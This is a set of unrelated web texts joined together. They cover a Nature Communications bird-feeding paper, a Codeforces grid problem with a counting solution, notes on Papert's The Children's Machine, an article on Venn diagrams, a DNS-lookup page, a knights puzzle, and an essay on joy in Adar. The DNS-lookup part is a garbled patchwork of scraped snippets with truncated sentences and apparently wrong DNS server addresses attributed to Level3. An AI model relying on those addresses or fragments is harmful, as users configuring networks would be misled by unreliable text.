Orme, D. et al. caper: Comparative Analyses of Phylogenetics and Evolution in R. R package version 1.0.1. https://CRAN.R-project.org/package=caper (2018).
We thank all the amateur ornithologists who have contributed to the collection of bird data; the past and present GBFS administrative team, particularly A. Prior, and C. Simm for overseeing the survey; K.W. Smith and L. Smith for discussions about and help with collecting the bird food industry data; D. Massimino for sharing the CBC/BBS bird trend annual indices; S. Gillings for help with examining bird spatial range shifts; J.W. Pearce-Higgins, S. Bearhop and K. Metcalfe for comments and suggestions on previous versions of the manuscript. This paper is the product of an institutional fellowship award (to K.E.P.), made possible thanks to a generous legacy donation to the BTO from Maxwell Hoggett.
The authors declare no competing interests.
Journal peer review information: Nature Communications thanks the anonymous reviewers for their contribution to the peer review of this work. Peer reviewer reports are available.
Publisher’s note: Springer Nature remains neutral with regard to jurisdictional claims in published maps and institutional affiliations.
Open Access This article is licensed under a Creative Commons Attribution 4.0 International License, which permits use, sharing, adaptation, distribution and reproduction in any medium or format, as long as you give appropriate credit to the original author(s) and the source, provide a link to the Creative Commons license, and indicate if changes were made. The images or other third party material in this article are included in the article’s Creative Commons license, unless indicated otherwise in a credit line to the material. If material is not included in the article’s Creative Commons license and your intended use is not permitted by statutory regulation or exceeds the permitted use, you will need to obtain permission directly from the copyright holder. To view a copy of this license, visit http://creativecommons.org/licenses/by/4.0/.
Plummer, K.E., Risely, K., Toms, M.P. et al. The composition of British bird communities is associated with long-term garden bird feeding. Nat Commun 10, 2088 (2019). https://doi.org/10.1038/s41467-019-10111-5
Educational Codeforces Round 68 B Yet Another Crosses Problem
memory limit per test : 256 megabytes
input : standard input
output : standard output
You are given a picture consisting of $n$ rows and $m$ columns. Rows are numbered from $1$ to $n$ from top to bottom, columns are numbered from $1$ to $m$ from left to right. Each cell is painted either black or white.
You think that this picture is not interesting enough. You consider a picture to be interesting if there is at least one cross in it. A cross is represented by a pair of numbers $x$ and $y$ , where $1≤x≤n$ and $1≤y≤m$, such that all cells in row $x$ and all cells in column $y$ are painted black.
For example, each of these pictures contains crosses:
The fourth picture contains 4 crosses: at $(1,3)$, $(1,5)$, $(3,3)$ and $(3,5)$.
The following images don’t contain crosses:
You have a brush and a can of black paint, so you can make this picture interesting. Each minute you may choose a white cell and paint it black.
What is the minimum number of minutes you have to spend so the resulting picture contains at least one cross?
You are also asked to answer multiple independent queries.
The first line contains an integer $q$ ($1 \le q \le 5 \cdot 10^4$) — the number of queries.
The first line of each query contains two integers $n$ and $m$ ($1 \le n, m \le 5 \cdot 10^4$, $n \cdot m \le 4 \cdot 10^5$) — the number of rows and the number of columns in the picture.
Each of the next $n$ lines contains $m$ characters — ‘.’ if the cell is painted white and ‘*’ if the cell is painted black.
It is guaranteed that $\sum n\le5\times10^4, \sum n\times m \le 4 \times 10^5$.
Print $q$ lines, the $i$-th line should contain a single integer — the answer to the $i$-th query, which is the minimum number of minutes you have to spend so the resulting picture contains at least one cross.
The example contains all the pictures from above in the same order.
The first 5 pictures already contain a cross, thus you don’t have to paint anything.
You can paint $(1,3)$, $(3,1)$, $(5,3)$ and $(3,5)$ on the $6$-th picture to get a cross in $(3,3)$. That’ll take you $4$ minutes.
You can paint $(1,2)$ on the $7$-th picture to get a cross in $(4,2)$.
You can paint $(2,2)$ on the $8$-th picture to get a cross in $(2,2)$. You can, for example, paint $(1,3)$, $(3,1)$ and $(3,3)$ to get a cross in $(3,3)$, but that will take you $3$ minutes instead of $1$.
There are $9$ possible crosses you can get in minimum time on the $9$-th picture. One of them is in $(1,1)$: paint $(1,2)$ and $(2,1)$.
This problem was poison for me — a problem B, no less, and it hurt. At first I used a brute-force approach and got WA on test 2, and I just could not find my mistake. Watching other people pass the problem one after another while I stayed stuck was miserable. It cost me almost the entire contest, leaving no time to look at problem D, which I solved almost instantly after the round. Ah well, still too weak; if I had not been stuck on this one I should have gained a lot of rating.
Count the number of ‘.’ cells in each row (r) and in each column (c) separately, then iterate over every cell and update the minimum with
r[i] + c[j] - (maze[i][j] == '.')
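A minimal Python sketch of this counting solution (the function and variable names are mine; the note above uses a C-style expression):

```python
def min_minutes_to_cross(grid):
    """Minimum number of white cells to paint so that some row x and
    column y are entirely black, i.e. the picture contains a cross at (x, y).
    grid: list of equal-length strings of '.' (white) and '*' (black)."""
    n, m = len(grid), len(grid[0])
    row_white = [row.count('.') for row in grid]
    col_white = [sum(grid[i][j] == '.' for i in range(n)) for j in range(m)]
    best = n + m  # loose upper bound: paint a whole row and column
    for i in range(n):
        for j in range(m):
            # Cost of completing row i and column j; subtract 1 if the
            # shared cell (i, j) is white, since it was counted twice.
            cost = row_white[i] + col_white[j] - (grid[i][j] == '.')
            best = min(best, cost)
    return best

min_minutes_to_cross(['..', '..'])           # -> 3
min_minutes_to_cross(['*.*', '***', '*.*'])  # -> 0
```

This is O(nm) per query, which fits the $\sum n \cdot m \le 4 \times 10^5$ constraint comfortably.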
These are some unfinished notes that I have taken while reading The Children’s Machine by Seymour Papert. I hope that someday I will weave them into something more fluid.
Why, through a period when so much human activity has been revolutionized, have we not seen comparable change in the way we help our children learn?
One could indeed make kitchen math part of the School by making School part of the kitchen.
Are there any snakes in the house?
Yes there are, there are zero snakes in the house!
So, negative numbers are numbers too, and their reality grows in the course of playing with the turtle.
You can’t retire from a good project simply because it has succeeded.
Constructionism: it does not call into question the value of instruction as such.
The kind of knowledge that children most need is the knowledge that will help them get more knowledge.
If the children really want to learn something, and have the opportunity to learn it in its use, they do so even if the teaching is poor.
Constructionism looks more closely than other educational -isms at the idea of mental construction. It attaches a special importance to role of constructions in the world as a support for those in the head, thereby becoming less of a purely mentalistic doctrine. It also takes the idea of constructing in the head more seriously by recognizing more than one kind of construction and by asking questions about the methods and materials used.
How can one become expert in constructing knowledge?
What skills are required?
Are these skills different for different kinds of knowledge?
School math, like the ideology, though not necessarily the practice, of modern science, is based on the idea of generality – the single, universally correct method that will work for all problems and for all people.
Use what you’ve got, improvise, make do.
The natural context for learning would be through participation in activities other than math itself.
The reason is that the educators who advocate imposing abstract ways of thinking on students almost always practice what they preach – as I tried to do in adopting a concrete style of writing – but with very different effects.
But however concrete their data, any statistical question about “the effect” of “the computer” is irretrievably abstract. This is because all such studies depend on use of what is known as the “scientific method,” in the form of experiments designed to study the effect of one factor, which is varied while taking great pains to keep everything else the same. … But nothing could be more absurd than an experiment in which computers are placed in a classroom where nothing else has changed. The entire point of all the examples I have given is that the computers serve best when they allow everything to change.
The concept of a highly rigorous and formal scientific method that most of us have been taught in school is really an ideology proclaimed in books, taught in schools, and argued by philosophers but widely ignored in the actual practice of science.
They count the same, but it’s more eggs.
My overarching message to anyone who wishes to influence, or simply understand, the development of educational computing is that it is not about one damn product after another (to paraphrase a saying about how school teaches history). Its essence is the growth of a culture, and it can be influenced constructively only through understanding and fostering trends in this culture.
I would rather be precisely wrong than vaguely right.
– Patrick Suppes
It had been obvious to me for a long time that one of the major difficulties in school subjects such as mathematics and science is that School insists on the student being precisely right. Surely it is necessary in some situations to be precisely right. But these situations cannot be the right ones for developing the kind of thinking that I most treasure myself and many creative people I know.
What computers had offered me was exactly what they should offer children! They should serve children as instruments to work with and to think with, as means to carry out projects, the source of concepts to think new ideas. The last thing in the world I wanted or needed was a drill-and-practice program telling me to do this sum or spell that word! Why should we impose such a thing on children?
The opportunity for fantasy opens the door to a feeling of intimacy with the work and provides a peep at how the emotional side of children’s relationship with science and technology could be very different from what is traditional in School. Fantasy has always been encouraged in good creative writing and art classes. Excluding it from science is a foolish neglect of an opportunity to develop bonding between children and science.
Errors can become sources of information.
Although the ultimate goal was the same, the means were more than just qualitatively different; they were epistemologically different in that they used a different way of thinking.
Traditional epistemology is an epistemology of precision: knowledge is valued for being precise and considered inferior if it lacks precision. Cybernetics creates an epistemology of
The real problem was that I was still thinking in terms of how to “get the children to do something.” This is the educator’s instinctive way of thinking: How can you get children to like math, to write wonderfully, to enjoy programming, to use higher-order thinking skills? It took a long time for me to understand in my gut, even after I was going around saying it, that Logo graphics was successful because of the power it /gave/ to children, not because of the performance it /got from/ them.
Children love constructing things, so let’s choose a construction set and add to it whatever is needed for them to make cybernetic constructions.
boys over girls?
The first question concerns what piece of the school curriculum is
being learned but I attach the most importance to such issues as
children’s relationship with technology, then idea of learning,
their sense of self. As for the gender issue, I am thinking more
about, how in the long run comoutational activities will affect
gender than how the gener will affect the activities.
Their work provides good examples of material that overlaps with School science and math, and of an alternative style applied to these subjects – instead of a formal style that uses rules, a concrete style that uses objects.
It is worth noting that the students appreciated the self-organizing nature of the traffic jam only because they had written the programs themselves. Had they been using a packaged simulation, they would have had no way of knowing the elegant simplicity of the programs underlying the jam.
Emergent structures often behave very differently than the elements that compose them.
The cathedral model of education applies the same principle to building knowledge structures. The curriculum designer is cast in the role of a “knowledge architect” who will specify a plan, a tight program, for the placement of “knowledge bricks” in
What is typical of emergently programmed systems is that deviations from what was expected do not cause the whole to collapse but provoke adaptive responses.
We are living with an educational system that is fundamentally as irrational as the command economy and ultimately for the same reason. It does not have the capacity for local adaptation that is necessary for a complex system even to function efficiently in a changing environment, and is doubly necessary for such a system to be able to evolve.
Defining educational success by test scores is not very different from counting nails made rather than nails used.
But calling hierarchy into question is the crux of the problem if
Each of these cases suggests ways in which a little school created in a militant spirit can mobilize technology as an assertion of
I could continue in this spirit, but this may be enough to make the point that little schools could give themselves a deeper and more conscious specific identity. Everything I have said in this book converges to suggest that this would produce rich intellectual environments in which not only children and teachers but also new ideas about learning would develop together.
I see little schools as the most powerful, perhaps an essential, route to generating variety for the evolution of education.
The prevailing wisdom in the education establishment might agree with the need for variety but look to other sources to provide it. For example, many – let us call them the Rigorous Researchers – would say that the proper place for both variation and selection is in the laboratory. On their model, researchers should develop large numbers of different ideas, test them rigorously, select the best, and disseminate them to schools. In my view this is simply Gosplan in disguise.
The importance of the concept of the little school is that it provides a powerful, perhaps by far the most powerful, strategy to allow the operation of the principle of variation and selection.
This objection depends on an assumption that is at the core of the technicalist model of education: certain procedures are the best, and the people involved can be ordered to carry them out. But even if there were such a thing as “the best method” for learning, it would still only be the best, or even mildly good, if people believed in it. The bureaucrat thinks that you can make people believe in something by issuing orders.
The design of a learning environment has to take account of the cultural environment as well, and its implementation must make a serious effort at involvement of the communities in which it is to operate.
It is no longer necessary to bring a thousand children together in one building and under one administration in order to develop a sense of community.
I do not see that School can be defended in its social role. It does not serve the functions it claims, and will do so less and less.
Talking about megachange feels to them like fiddling while Rome burns. Education today is faced with immediate, urgent problems. Tell us how to use your computer to solve some of the many immediate practical problems we have, they say.
Impediments to change in education: cost, politics, the immense power of the vested interests of school bureaucrats, and lack of scientific research on new forms of learning.
Large numbers of teachers manage to create within the walls of their own classrooms oases of learning profoundly at odds with the education philosophy espoused by their administrators…
But despite the many manifestations of a widespread desire for something different, the education establishment, including most of its research community, remains largely committed to the educational philosophy of the late nineteenth and early twentieth centuries, and so far none of those who challenge these hallowed traditions has been able to loosen the hold of the educational establishment on how children are taught.
Do children like games more than homework because the latter is harder than the former?
Most [games] are hard, with complex information – as well as techniques – to be mastered, the information often much more difficult and time-consuming to master than the technique.
These toys, by empowering children to test out ideas about working within prefixed rules and structures in a way few other toys are capable of doing, have proved capable of teaching students about the possibilities and drawbacks of a newly presented system in ways many adults should envy.
In trying to teach children what adults want them to know, does School utilize the way human beings most naturally learn in nonschool settings?
If it has so long been so desperately needed, why have previous calls for it not caught fire?
Is reading the principal access route to knowledge?
Ask a sympathetic adult who would reward her curiosity with praise.
Literacy is being able to read and write. Illiteracy can be remedied by teaching children the mechanical skill of decoding black marks on white paper.
/Letteracy/ and /Letterate/
Reading from Word to Reading from World
… the Knowledge Machine offers children a transition between preschool learning and true literacy in a way that is more personal, more negotiational, more gradual, and so less precarious than the abrupt transition we now ask children to make as they move from learning through direct experience to using the printed word as a source of important information.
… School’s way is the only way because they have never seen or imagined convincing alternatives in the ability to impart certain kinds of knowledge.
* Babies learn to talk without curriculum or formal lessons
* People develop hobbies and skills without teachers
* Social behavior is picked up other than through classroom instruction
Parable of the Automobile: … certain problems that had been abstract and hard to grasp became concrete and transparent, and certain projects that had seemed interesting but too complex to undertake became manageable.
Paulo Freire: the “banking model” – information is deposited in the child’s mind like money in a savings account.
/Tools/ for creating new experiments in an effective fashion.
* Dewey: children would learn better if learning were truly a part of living experience
* Freire: children would learn better if they were truly in charge of their own learning processes
* Piaget: intelligence emerges from an evolutionary process in which many factors must have time to find their equilibrium
* Vygotsky: conversation plays a crucial role in learning
Why did the discovery method fail?
By closing off a much larger basis of knowledge that should serve as a foundation for the formal mathematics taught in school, and perhaps a minimal intuitive basis directly connected with
The central problem of mathematics education is to find ways to draw on the child’s vast experience of oral mathematics. Computers can do this.
Giving children the opportunity to learn and use mathematics in a nonformalized way of knowing encourages rather than inhibits the eventual adoption of the formalized way, just as the XO, rather than discouraging reading, would eventually stimulate children to read.
The design process is not used to learn more formal geometry.
Traditionally the art and writing classes are for fantasy but science deals with facts; union of technology with biology.
It allows them to enter science through a region where scientific thinking is most like their own thinking.
Reading biographies and interrogating friends has convinced me that all successful learners find ways to take charge of their early lives sufficiently to develop a sense of intellectual identity.
Piaget’s first article: a paradox?
Schools have an inherent tendency to infantilize children by
placing them in a position of having to do as they are told,
to occupy themselves with work dictated by someone else and
that, moreover, has no intrinsic value – school work is done only
because the designer of the curriculum decided that doing this
work would shape the doer into a desirable form [for the …]
NatGeo: Kidnet?? (Robert Tinker)
Researchers, following the so-called scientific method of
using controlled experiments, solemnly expose the children to
a “treatment” of some sort and then look at measurable
results. But this flies in the face of all common knowledge
of how human beings develop.
The method of controlled experimentation that evaluates an
idea by implementing it, taking care to keep everything else
the same, and measuring the result, may be an appropriate way
to evaluate the effects of a small modification. However, it
can tell us nothing about ideas that might lead to deep
change… It will be steered less by the outcome of tests and
measurements than by its participants’ intuitive understanding.
The prevalent literal-minded, “what you see is what you get”
approach to measuring the effectiveness of computers in learning
by the achievements in present-day classrooms makes it certain
that tomorrow will always be prisoner of yesterday.
Example of a jet engine attached to a horse-drawn wagon.
… most people are more interested in what they learn than in how
the learning happens.
But math is not about feeling the relationship of your body to …
Turtle lets you do this!
Intellectual work is adult child’s play.
Example: if observation of schools in some country where
only one writing instrument could be provided for every fifty
students suggested that writing does not significantly help …
The change requires a much longer and more social computer
experience than is possible with two machines at the back of
the classroom.
/Balkanized Curriculum and impersonal rote learning/
What had started as a subversive instrument of change was
neutralized by the system and converted into an instrument of …
Schools will not come to use computers “properly” because
researchers tell it how to do so.
It is characteristic of conservative systems that
accommodation will come only when the opportunities of
assimilation have been exhausted.
* Immediate Feedback
* Individualized instruction
* Neutrality
CAI will often modestly raise test scores, especially at the low end
of the scale. But it does so without questioning the structure or the
educational goals of the traditional School.
Today, because it is the 15th Monday of your 5th grade year,
you have to do this sum irrespective of who you are or what
you really want to do; do what you are told and do it the
way you are told to do it.
Piaget was the theorist of learning without curriculum;
School spawned the project of developing a Piagetian curriculum.
The central issue of change in education is the tension
between technicalizing and not technicalizing, and here the teacher
occupies the fulcrum position.
Shaw: He who can, does; he who cannot, teaches.
The system defeats its own purpose in its attempt to enforce them.
School has evolved a hierarchical system of control that
sets narrow limits within which the actors – administrators
as well as teachers – are allowed to exercise a degree of …
Hierarchy vs. Heterarchy
The major obstacle in the way of teachers becoming learners
is inhibition about learning.
The problem with `developed’ countries as opposed to `developing’ ones
is that the developed countries are already there; there is no further …
In education, the highest mark of success is not having imitators but
inspiring others to do something else.
As long as there is a fixed curriculum, a teacher has no need to become
involved in the question of what is and what is not mathematics.
Society cannot afford to keep back its potentially best teachers
simply because some, or even most, are unwilling.
The how-to-do-it literature in the constructivist subculture is almost
as strongly biased to the teacher side as it is in the instructionist
subculture.
/Mathematikos/ disposed to learn
/mathema/ a lesson
/manthanein/ to learn
… mathetics is to learning what heuristics is to problem solving.
What is that feeling when you look at a familiar object, with a sense
that you are looking at the object for the first time?
It is /jamais vu/.
Attempts by teachers and textbook authors to connect school fractions
with real life via representations as pies simply resulted in a new …
* What is the difference between learning at school and all other learning?
Generally in life, knowledge is acquired to be used. But school
learning more often fits Freire’s apt metaphor: Knowledge is treated
like money, to be put away in a bank for the future.
* What does /Computer Literacy/ mean?
* The Technology of the Blackboard and The Technology of The Computer
* Lines You can use:
The computer to program the student…
The student to program the computer…
Computer as an expensive set of flash cards.
If the students’ scores improve, our approach must be right.
Self-directed activities versus carefully guided ones
If the scores improve, does it mean that the strategy is effective /
the approach is right?
Heterarchical versus Hierarchical
Totalitarian Education or Trivialized Education | <urn:uuid:1d669837-8c25-41b7-9a94-0728b02f6906> | CC-MAIN-2023-14 | https://damitr.org/category/xo/ | s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296949355.52/warc/CC-MAIN-20230330163823-20230330193823-00601.warc.gz | en | 0.951936 | 4,521 | 2.953125 | 3 |
More often than I care to admit, I find myself sitting in the audience of a maths lecture or seminar completely and utterly lost as to what the speaker is going on about. What are they talking about? How does this relate to stuff I know about? Where does this fit within the sphere of mathematics as a whole? In fact, most of the time I am lost beyond the first slide of a presentation. In an endeavour to minimise the possibility that audience members would experience this feeling that I know all too well, I recently introduced myself at the start of a talk with this slide:
You could be forgiven for remarking “My, what a beautiful Venn diagram you have there!” Indeed, I too was under the impression that what I had created was in fact a Venn diagram.
You almost certainly will have come across Venn diagrams before. Though in case you have not, allow me to briefly introduce them. Venn diagrams are widely-used visual representation tools that show logical relationships between sets. Popularised by John Venn in the 1880s, they illustrate simple relations between sets, and are nowadays used across a multitude of scenarios and contexts. And no one can be blamed for their wide usage—they truly are things of beauty. But who was John Venn? And how did he come to create such an iconic tool that’s used so broadly today?John Venn (1834–1923) was an English mathematician, logician and philosopher during the Victorian era. In 1866, he published The Logic of Chance, a groundbreaking book which advocated the frequency theory of probability—the theory that probability should be determined by how often something is forecast to occur, as opposed to ‘educated’ assumptions.
The Victorian era in general saw significant shifts in the way that science and experimental measurements were thought about. It was at this point in history that science began to shift towards a new paradigm of statistical models, rather than exact descriptions of reality. Previously, scientists had believed that mathematical formulas could be used to describe reality exactly. But nowadays, we talk about probabilities and distributions of values, and not about certainties. We now interpret individual experimental measurements knowing that, no matter how precise or controlled an experiment is, some degree of randomness always exists. Using statistical models of distributions is what enables us to describe the mathematical nature of that randomness.
But I digress—back to Venn diagrams. When Venn actually first created his namesake diagrams, he referred to them as Eulerian circles, after everyone’s favourite Swiss mathematician Leonhard Euler, who created similar diagrams in the 1700s. And this is where, I regret to inform you, the thing is—and I’m very sorry to be the one to tell you—that Venn diagram up there? Not actually a Venn diagram.
By definition, in a Venn diagram, the curves of all the sets shown must overlap in every possible way, showing all possible relations between the sets, regardless of whether or not the intersection of the sets is empty: $\emptyset$. Venn diagrams are actually a special case of a larger group of visual representations of sets: Euler diagrams. Euler diagrams are like Venn diagrams, except they do not necessarily show all relations.
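To make the ‘every possible way’ requirement concrete: a Venn diagram on $n$ sets must display one region for every subset of the sets—the empty subset being the exterior—so $2^n$ regions in all. A quick illustrative sketch (in Python; the set names are just for fun):

```python
from itertools import combinations

def venn_regions(set_names):
    """All regions a Venn diagram on these sets must display:
    one region per subset of the sets (the empty subset is the exterior)."""
    return [frozenset(combo)
            for r in range(len(set_names) + 1)
            for combo in combinations(set_names, r)]

names = ["Chalkdust readers", "tea drinkers", "cats"]
print(len(venn_regions(names)))  # 2**3 = 8 regions, exterior included
```

Each `frozenset` names one region by the sets it lies inside; doubling the number of regions with every added set is exactly why the diagrams get unwieldy so quickly.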
When thinking about Venn diagrams, we normally picture something like my beautiful introductory slide above, right? Namely, there are circles, and they overlap. The interior of each of the circles represents all of the elements of that set, while the exterior represents things that are not in that set. For example, in a two-set Venn diagram, one circle may represent the group of all Chalkdust readers, while the other circle may represent the set of tea drinkers. The overlapping region, or intersection, would then represent the set of all Chalkdust readers that drink tea (a verifiably non-empty set). It is common for the size of the circles to represent relative size of the set that circle is representing (eg one’s undergraduate maths education being much (much) smaller compared with the sphere of mathematics as a whole).
We also commonly see nested Venn diagrams, where one set is completely situated within another set (again, one’s undergraduate maths education being entirely nested in the realm of mathematics as a whole [though this is debatable—I’ll save this for the next Chalkdust article]). But in a traditional, true-to-definition Venn diagram, every single possible combination of intersections of the sets must be visually displayed…
(While we cannot verify whether or not there exist cats that are also Chalkdust readers and/or tea drinkers, the Venn diagram insists we show all possible intersections.)
It is actually mathematically impossible to draw a Venn diagram exclusively with circles for more than three sets. If we add a fourth set below, no matter how you move the four circles around, you can never find a region that isolates only the intersection of diagonally opposite sets—cats and tea drinkers (or Chalkdust readers and accordion players). Formal mathematical proof is LeFt aS An eXeRcIsE fOr ThE rEaDeR.
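For the curious, here is a counting sketch (not the formal proof teased above): $n$ circles in general position divide the plane into at most $n^2 - n + 2$ regions, because the $k$th circle crosses each earlier circle in at most two points and so adds at most $2(k-1)$ new regions. A Venn diagram on $n$ sets needs $2^n$ regions, and at $n = 4$ the counts part ways: $14 < 16$. A small illustrative check in Python:

```python
def max_circle_regions(n):
    """Maximum number of plane regions cut out by n circles in general
    position: circle 1 splits the plane in two; circle k >= 2 meets each
    earlier circle in at most 2 points, gaining at most 2*(k-1) regions."""
    regions = 1  # the empty plane is one region
    for k in range(1, n + 1):
        regions += 1 if k == 1 else 2 * (k - 1)
    return regions  # closed form: n*n - n + 2 for n >= 1

for n in range(1, 5):
    print(n, max_circle_regions(n), 2 ** n)
# at n = 4: only 14 regions available but 16 needed -- no 4-circle Venn diagram
```

For $n = 1, 2, 3$ the two counts agree ($2, 4, 8$), which is why circles suffice up to three sets and fail from four onwards.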
As you can see then on the right, for high numbers of sets (‘high numbers’ $=$ greater than three), unfortunately some loss of symmetry in the diagrams is unavoidable. John Venn experimented with ellipses for the four-set case in an attempt to cling onto some diagrammatic elegance and symmetry. He also devised Venn’s constructions which gave a construction for Venn diagrams for any number of sets. These constructions started with the three-set circular Venn diagram and added arc-like shapes which weaved between each of the previous sets to create every possible logical intersection. These constructions quickly become quite dizzying (see the loopiness of Venn’s construction for six sets):
So what can we do if we don’t want to weave back and forth so dizzyingly for higher numbers of sets? Enter: Edwards–Venn diagrams. Anthony William Fairbank Edwards (1935–) constructed a series of Venn diagrams for higher numbers of sets. He did this by segmenting the surface of a sphere.
For example—as you can see on the right—three sets can be easily represented by taking three hemispheres of the sphere at right angles ($x = 0$, $y = 0$ and $z = 0$). He then added a fourth set to the representation, by taking a curve similar to the seam on a tennis ball, which winds up and down around the equator, and so on.
The resulting sets can then be projected back to a plane, to give cogwheel diagrams, with increasing numbers of teeth for more and more sets represented:
So finally, to conclude this article, I present to you my new and improved introductory (actually-a-Venn) diagram:
While I appreciate the poetic implication that the realms of my respective research groups (fluid dynamics and behavioural genomics) weave in and out of my PhD project, which is nested neatly in the centre, in reality many of these intersections are quite empty.
Please consider this article in support of my upcoming petition to make it mandatory for academics to introduce themselves at the start of every talk with a Venn (or Euler) diagram.
The DNS Lookup tool finds all DNS records of a given domain name. The records include, but are not limited to, A, AAAA, CNAME, MX, NS, PTR, SRV, SOA, TXT and CAA. Enter a domain name and select a record type to get a specific record, or keep the default to fetch all DNS records.
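As a minimal illustration of the idea (a Python sketch using only the standard library—it resolves A records through the operating system's resolver; a full lookup tool would query the other record types against the name server directly):

```python
import socket

def lookup_a_records(hostname):
    """Return the IPv4 (A-record) addresses for `hostname`, resolved
    through the operating system's resolver."""
    infos = socket.getaddrinfo(hostname, None, family=socket.AF_INET,
                               type=socket.SOCK_STREAM)
    # each entry is (family, type, proto, canonname, (address, port))
    return sorted({info[4][0] for info in infos})

print(lookup_a_records("localhost"))
```

Note this goes through whatever resolver (and cache) the machine is configured with, so unlike a query sent straight to the authoritative name server, recent record changes may not show up immediately.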
Jul 09, 2020 · The network settings for your computer, router, or access point allow you to specify which DNS servers—primary and secondary—to use. By default, these are likely set by your internet service provider, but there may be faster ones you can use.

The next very popular DNS service on our list is “Level3”, considered the best after the Google and OpenDNS services. To use the Level3 DNS server, configure your Domain Name System settings to the following IP addresses. Preferred DNS server: 220.127.116.11; Alternate DNS server: 18.104.22.168.

ABOUT DNS LOOKUP. This test will list DNS records for a domain in priority order. The DNS lookup is done directly against the domain's authoritative name server, so changes to DNS records should show up instantly. By default, the DNS lookup tool will return an IP address if you give it a name (e.g. www.example.com).

Jul 27, 2017 · Hi All, I'm having some fun with a PowerShell script for setting the DNS settings of clients:

$dnsserver = (,"W.X.Y.Z")
$Computer = Get-Content "c:\users\path\to\my.csv"
Gather DNS settings from remote servers using PowerShell. This script is a continuation of the script in the “Performing Advanced Server Management” chapter in the Windows PowerShell 2.0 Bible, which itself was a modified version of a script I presented on my blog on May 12th, 2010: PowerShell WMI – Gather DNS settings for all Servers.
This command gets a DNS server configuration.

Example 2: Get local DNS server configuration and then export it.

PS C:\> Get-DnsServer | Export-Clixml -Path "c:\config\DnsServerConfig.xml"

This command gets the DNS server configuration on the local server and passes it to the Export-Clixml cmdlet to be translated into an XML file.
Jun 18, 2020
Use Powershell or CMD to list DNS Servers in Domain. A sample way out is open CMD or Powershell and start the NSLOOKUP utilitiy. Next, In order to get the list of DNS Servers in domain, set the type to NS and finally, type your Root Domain Name and press Enter. Above list will list DNS Server in your domain. How to Fix DNS Server Not Responding Errors Jun 17, 2020 How to Double Your Internet Speed With One Settings Change Jul 09, 2020 | <urn:uuid:1da49682-1cda-49b9-8c41-eab11f41e88e> | CC-MAIN-2023-14 | https://goodvpnfeltgs.netlify.app/galinol6302vana/get-dns-settings-706.html | s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296949533.16/warc/CC-MAIN-20230331020535-20230331050535-00202.warc.gz | en | 0.8113 | 620 | 2.515625 | 3 |
Knights in Fen
There are black and white knights on a 5 by 5 chessboard. There are twelve of each color, and there is one square that is empty. At any time, a knight can move into an empty square as long as it moves like a knight in normal chess (what else did you expect?).
Given an initial position of the board, the question is: “what is the minimum number of moves in which we can reach the final position”, which is:

[figure: the final board configuration, not reproduced here]
First line of the input file contains an integer $N$ ($N<14$) that indicates how many sets of inputs are there. The description of each set is given below:
Each set consists of five lines; each line represents one row of a chessboard. The positions occupied by white knights are marked by $0$ and the positions occupied by black knights are marked by $1$. The space corresponds to the empty square on board.
There is no blank line between the two sets of input.
The first set of the sample input below corresponds to this configuration:

[figure: the first set's board configuration, not reproduced here]
For each set your task is to find the minimum number of moves leading from the starting input configuration to the final one. If that number is bigger than $10$, then output one line stating
Unsolvable in less than 11 move(s).
otherwise output one line stating
Solvable in $n$ move(s).
where $n \leq 10$.
The output for each set is produced in a single line as shown in the sample output.
Sample Input 1:

2
01011
110 1
01110
01010
00100
10110
01 11
10111
01001
00000

Sample Output 1:

Unsolvable in less than 11 move(s).
Solvable in 7 move(s).
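The bound of 10 moves keeps a breadth-first search comfortably tractable: only the empty square really moves (like a knight, swapping places with the knight that jumps into it), so the branching factor is at most 8. A Python sketch follows; note that the TARGET configuration here is an assumption, standing in for the final-position figure that is not reproduced in the text above:

```python
# Assumed target configuration -- a stand-in for the final-position
# figure in the problem statement; treat it as a placeholder.
TARGET = ("11111",
          "01111",
          "00 11",
          "00001",
          "00000")

KNIGHT_MOVES = [(-2, -1), (-2, 1), (-1, -2), (-1, 2),
                (1, -2), (1, 2), (2, -1), (2, 1)]

def min_moves(board, limit=10):
    """Breadth-first search from `board` (a tuple of five 5-character
    strings; ' ' marks the empty square). Returns the minimum number of
    moves to reach TARGET, or None if more than `limit` are needed."""
    start = tuple(board)
    if start == TARGET:
        return 0
    seen = {start}
    frontier = [start]
    for depth in range(1, limit + 1):
        next_frontier = []
        for state in frontier:
            # locate the empty square
            r = next(i for i, row in enumerate(state) if " " in row)
            c = state[r].index(" ")
            # a knight jumps into the empty square: equivalently, the
            # empty square makes a knight move and swaps with that knight
            for dr, dc in KNIGHT_MOVES:
                nr, nc = r + dr, c + dc
                if 0 <= nr < 5 and 0 <= nc < 5:
                    rows = [list(row) for row in state]
                    rows[r][c], rows[nr][nc] = rows[nr][nc], " "
                    new_state = tuple("".join(row) for row in rows)
                    if new_state == TARGET:
                        return depth
                    if new_state not in seen:
                        seen.add(new_state)
                        next_frontier.append(new_state)
        frontier = next_frontier
    return None

print(min_moves(TARGET))  # 0
```

For each input set, parse the five rows, call `min_moves`, and print “Solvable in n move(s).” when a depth `n <= 10` is returned, otherwise the “Unsolvable” line. A bidirectional search (meeting in the middle at depth 5) would cut the state count further if needed.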
Rav Itamar Shwarz, the author of the Bilvavi Mishkan Evneh.
The First Simcha Was Between Adam and Chava In Gan Eden
The month of Adar, as is well-known, contains the special power of simcha (happiness). The happiness already starts from the beginning of the month – “When Adar enters, we increase our happiness” – and it continues until it reaches its climax, on Purim. The joy of Purim is described in many verses in Megillas Esther: “And the city of Shushan was joyous and glad”; as well as in the verse, “To the Jews, there was light, gladness, joy, and honor.” There was “happiness and gladness to the Jews, festivity and a day of celebration.”
Let us delve into the root understanding behind the joy of Purim, so that we can arrive at true happiness in our souls, with the help of Hashem.
Where do we find the first mention of simcha in the Torah? Who was the first person to rejoice? When we bless the chosson and kallah during Sheva Berachos, one of the blessings is: “Rejoice, beloved friends, as your Creator gladdened you in Gan Eden of old.” We are blessing the chosson and kallah that just as Hashem rejoiced Adam and Chava in Gan Eden, so should the chosson and kallah reach this level of simcha. The first simcha mentioned in the Torah was Adam and Chavah as they rejoiced in Gan Eden, and Hashem Himself, in all His honor and glory, was the One who gladdened them.
Different Expressions of Simcha
The Sages list ten different expressions of happiness: sasson, simcha, gilah, rinah, ditzah, tzahalah, alizah, chedvah, tiferes, and alitzah. Six of these are mentioned in the blessings we give to the chosson and kallah: sasson, simcha, gilah, rinah, ditzah and chedvah.
We have already explained earlier about the different joys of sasson and simcha. Now we will reflect on the other four expressions which we bless the chosson and kallah with: gilah, rinah, ditzah, and chedvah.
